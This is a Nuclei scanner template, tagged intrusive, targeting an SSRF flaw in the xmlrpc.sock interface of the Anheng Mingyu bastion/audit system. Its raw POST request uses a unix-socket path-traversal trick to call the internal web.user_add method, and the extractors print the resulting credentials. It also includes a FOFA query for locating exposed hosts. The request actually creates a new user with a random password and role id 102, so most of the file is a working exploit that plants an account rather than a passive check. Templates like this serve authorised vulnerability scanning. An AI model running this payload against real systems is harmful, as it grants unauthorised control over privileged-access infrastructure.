nuclei-templates/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml

id: mingyu-xmlrpc-sock-adduser

info:
  name: Mingyu Operation xmlrpc.sock - User Addition
  author: SleepingBag945
  severity: high
  description: |
    There is an SSRF vulnerability in the xmlrpc.sock interface of Anheng Mingyu operation and maintenance audit and risk control system, through which any user can be added to control the bastion machine    
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/dbappsecurity-mingyu-xmlrpc-sock-adduser.yaml
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%AE%89%E6%81%92/%E5%AE%89%E6%81%92%20%E6%98%8E%E5%BE%A1%E8%BF%90%E7%BB%B4%E5%AE%A1%E8%AE%A1%E4%B8%8E%E9%A3%8E%E9%99%A9%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%BB%9F%20xmlrpc.sock%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E6%B7%BB%E5%8A%A0%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: "明御运维审计与风险控制系统"
  tags: mingyu,xmlrpc,sock,intrusive,misconfig
variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  random: "{{rand_base(4)}}"

http:
  - raw:
      - |
        POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://{{random}}/wsrpc HTTP/1.1
        Host: {{Hostname}}

        <?xml version="1.0"?>
        <methodCall>
        <methodName>web.user_add</methodName>
        <params>
        <param>
        <value>
        <array>
        <data>
        <value>
        <string>admin</string>
        </value>
        <value>
        <string>5</string>
        </value>
        <value>
        <string>10.0.0.1</string>
        </value>
        </data>
        </array>
        </value>
        </param>
        <param>
        <value>
        <struct>
        <member>
        <name>uname</name>
        <value>
        <string>{{username}}</string>
        </value>
        </member>
        <member>
        <name>name</name>
        <value>
        <string>{{username}}</string>
        </value>
        </member>
        <member>
        <name>pwd</name>
        <value>
        <string>{{password}}</string>
        </value>
        </member>
        <member>
        <name>authmode</name>
        <value>
        <string>1</string>
        </value>
        </member>
        <member>
        <name>deptid</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>email</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>mobile</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>comment</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>roleid</name>
        <value>
        <string>102</string>
        </value>
        </member>
        </struct></value>
        </param>
        </params>
        </methodCall>        

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/xml") && contains(body, "rolename") && contains(body, "authmode")'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"USERNAME: "+ username'
          - '"PASSWORD: "+ password'

# digest: 4a0a004730450220488a667a94a091971629a33cbf11fbfbe58905253a449022ffa03770c1768371022100ee2c1cb574e25e77c27e27a9f0469c3357de535acbebb531c7345f656103296b:922c64590222798bb761d5b6d8e72950